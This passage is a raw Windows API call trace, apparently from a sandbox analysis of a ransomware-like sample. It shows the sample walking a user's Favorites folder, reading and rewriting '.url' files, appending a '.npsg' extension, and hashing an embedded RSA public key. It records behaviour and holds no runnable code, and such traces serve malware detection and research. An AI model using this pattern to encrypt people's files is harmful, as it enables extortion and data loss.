lpMem=0x34007b8 | out: hHeap=0x620000) returned 1 [0237.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400800 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007b8 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34007a0 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007b8 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007a0 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.844] GetCurrentThreadId () returned 0x5b4 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82c18 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.845] GetCurrentThreadId () returned 0x5b4 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400800 [0237.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007a0 [0237.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007b8 [0237.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400788 [0237.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400818 [0237.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007e8 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007d0 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400830 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007d0 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007d0 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007e8 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007a0 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007a0 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0237.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400830 | out: hHeap=0x620000) returned 1 [0237.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007a0 | out: hHeap=0x620000) returned 1 [0237.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007d0 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007b8 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400788 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400770 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409638 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.849] WriteFile (in: hFile=0x644, lpBuffer=0x64e690*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x64e690*, lpNumberOfBytesWritten=0x39afb14*=0x80, lpOverlapped=0x0) returned 1 [0237.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.850] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.850] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.850] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.850] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.851] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.851] CloseHandle (hObject=0x644) returned 1 [0237.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0237.852] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.npsg")) returned 1 [0237.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.853] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0237.855] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0237.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0237.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.855] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0237.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.870] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.871] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.873] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.874] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.875] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.875] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.875] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.875] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.875] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.875] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.876] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.876] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.876] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.876] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.876] GetLastError () returned 0x0 [0237.877] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.877] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.877] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.877] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.877] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.877] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409638 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400770 [0237.877] RtlAllocateHeap 